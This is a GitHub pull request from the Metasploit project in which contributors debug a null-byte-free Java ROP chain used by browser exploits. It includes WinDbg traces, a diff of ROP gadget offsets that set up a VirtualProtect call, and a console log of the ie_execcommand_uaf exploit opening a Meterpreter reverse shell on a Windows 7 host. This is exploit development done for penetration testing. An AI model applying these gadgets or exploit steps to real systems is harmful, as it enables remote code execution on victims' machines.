Update: Null Byte Free Java ROP #1613

Merged
merged 2 commits into from Mar 19, 2013

Projects

None yet

4 participants

@wchen-r7
Contributor

Our new heap spray routine does not like double nulls, so we need to adjust our ROP.

@sinn3r sinn3r Java Rop null-byte free
Our new heap spray routine does not like double nulls, so we need
to adjust our ROP.
ea4c88b
@jvazquez-r7
Contributor
  • Modules using RopDB with the java ROP:
adobe_flash_otf_font.rb:            p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
adobe_flashplayer_flash10o.rb:          p = generate_rop_payload('java', payload.encoded)
crystal_reports_printcontrol.rb:        rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
ie_execcommand_uaf.rb:          rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
indusoft_issymbol_internationalseparator.rb:            rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms10_002_ie_object.rb:          rop_payload = generate_rop_payload('java', p)
ms11_050_mshtml_cobjectelement.rb:          rop_payload = generate_rop_payload('java', p)
ms11_081_option.rb:         rop_payload = generate_rop_payload('java', '')
ms12_037_same_id.rb:            rop = generate_rop_payload('java', '', {'pivot'=>pivot})
msxml_get_definition_code_exec.rb:              rop = generate_rop_payload('java','',{'pivot'=>adjust})
novell_groupwise_gwcls1_actvx.rb:               rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:               rop_payload = generate_rop_payload('java', code)
quickr_qp2_bof.rb:          rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
vlc_amv.rb:         code = generate_rop_payload('java', payload.encoded)
  • Tested with ie_execcommand_uaf.rb on IE8 / Windows 7 SP1, and it has stopped working:

Stackpivot is reached and the ROP is in the "new stack":

0:026> g
ModLoad: 718a0000 718f8000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
Breakpoint 0 hit
eax=0c0c0c0c ebx=0000001f ecx=02ad1630 edx=0000000d esi=00000000 edi=0c0c0c08
eip=7c348b05 esp=02169d0c ebp=02169d20 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSVCR71!wparse_cmdline+0x40:
7c348b05 94              xchg    eax,esp
0:005> t
eax=02169d0c ebx=0000001f ecx=02ad1630 edx=0000000d esi=00000000 edi=0c0c0c08
eip=7c348b06 esp=0c0c0c0c ebp=02169d20 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSVCR71!wparse_cmdline+0x41:
7c348b06 c3              ret
0:005> t
eax=02169d0c ebx=0000001f ecx=02ad1630 edx=0000000d esi=00000000 edi=0c0c0c08
eip=7c347f98 esp=0c0c0c10 ebp=02169d20 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSVCR71!__onexitinit+0x17:
7c347f98 c3              ret
0:005> dd esp
0c0c0c10  7c347f97 7c348b05 7c364c66 7c364c66
0c0c0c20  7c344edc fffffdff 7c351e05 7c3536e3
0c0c0c30  ffffffff 7c345255 7c35218e 7c345937
0c0c0c40  ffffffc0 7c351eb1 7c36c5b9 7c391e67
0c0c0c50  7c342e58 7c34d202 7c34f8f4 7c3415a2
0c0c0c60  7c344edc 7c37a140 7c378c81 7c345c30
0c0c0c70  f254c481 e8fcffff 00000089 31e58960
0c0c0c80  528b64d2 0c528b30 8b14528b b70f2872
  • The ROP execution crashes after the PUSHAD, when trying to jmp to VirtualProtect:
0:005> t
eax=7c37a140 ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=7c378c81 esp=0c0c0c6c ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
MSVCR71!Fill_FPIEEE_RECORD+0xbd:
7c378c81 60              pushad
0:005> t
eax=7c37a140 ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=7c378c82 esp=0c0c0c4c ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
MSVCR71!Fill_FPIEEE_RECORD+0xbe:
7c378c82 04ef            add     al,0EFh
0:005> t
eax=7c37a12f ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=7c378c84 esp=0c0c0c4c ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
MSVCR71!Fill_FPIEEE_RECORD+0xc0:
7c378c84 c3              ret
0:005> t
eax=7c37a12f ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=7c34d202 esp=0c0c0c50 ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
MSVCR71!signal+0x1a0:
7c34d202 c3              ret
0:005> dd esp
0c0c0c50  7c3415a2 7c364c66 0c0c0c6c 00000201
0c0c0c60  00000040 7c391e67 7c37a140 7c345c30
0c0c0c70  f254c481 e8fcffff 00000089 31e58960
0c0c0c80  528b64d2 0c528b30 8b14528b b70f2872
0c0c0c90  ff31264a 3cacc031 2c027c61 0dcfc120
0c0c0ca0  f0e2c701 528b5752 3c428b10 408bd001
0c0c0cb0  74c08578 50d0014a 8b18488b d3012058
0c0c0cc0  8b493ce3 d6018b34 c031ff31 0dcfc1ac
0:005> t
eax=7c37a12f ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=7c3415a2 esp=0c0c0c54 ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
MSVCR71!setSBUpLow+0x48:
7c3415a2 ff20            jmp     dword ptr [eax]      ds:0023:7c37a12f=777157aa
0:005> t
eax=7c37a12f ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=aa577177 esp=0c0c0c54 ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
aa577177 ??              ???

My guess is, the new ROP hasn't into account the AL adjustment after PUSHAD:

+    <gadget offset="0x00004edc">POP EAX # RETN</gadget>
+    <gadget offset="0x0003a140">ptr to VirtualProtect()</gadget> <-- it hasn't into account the add al, 0ef after pushad
+    <gadget offset="0x00038c81">,PUSHAD # ADD AL,0EF # RETN</gadget>
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Mar 19, 2013
data/ropdb/java.xml
<gadget offset="0x000015a2">JMP [EAX]</gadget>
- <gadget offset="0x000362fb">POP EAX # RETN</gadget>
- <gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
- <gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
- <gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
+ <gadget offset="0x00004edc">POP EAX # RETN</gadget>
+ <gadget offset="0x0003a140">ptr to VirtualProtect()</gadget>
@jvazquez-r7
jvazquez-r7 Mar 19, 2013 Contributor

This new ROP is failing in my test, I guess this ptr hasn't into account the "ADD AL, 0EF" afther the next pushad instruction. I think this ptr should be adjusted, as was done before:

<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
@corelanc0d3r
Contributor

also, the new dwSize might be a bit small - value used to be 0x400, and went down to 0x201

<gadget value="0xfffffdff">0x00000201</gadget>

@wchen-r7
Contributor

Updated.

@jvazquez-r7
Contributor

Awesome!

Now it's working with the java payload again :)

msf exploit(ie_execcommand_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/i5HHtBAlI
[*]  Local IP: http://192.168.1.128:8080/i5HHtBAlI
[*] Server started.
msf exploit(ie_execcommand_uaf) > [*] 192.168.1.131    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.131    ie_execcommand_uaf - Redirecting to ftexL.html
[*] 192.168.1.131    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.131    ie_execcommand_uaf - Loading ftexL.html
[*] 192.168.1.131    ie_execcommand_uaf - Using JRE ROP
[*] 192.168.1.131    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.131    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.131    ie_execcommand_uaf - Loading ulWqNC.html
[*] 192.168.1.131    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] Sending stage (752128 bytes) to 192.168.1.131
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.131:49511) at 2013-03-19 19:18:35 +0100
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.131:49511) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (824)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2656

msf exploit(ie_execcommand_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > [+] Successfully migrated to process 

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

Fixing a "comma typo" and merging

@jvazquez-r7 jvazquez-r7 merged commit be9d4ec into rapid7:master Mar 19, 2013

1 check passed

default The Travis build passed
Details
@wchen-r7 wchen-r7 deleted the wchen-r7:java_rop_update branch Aug 22, 2016
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment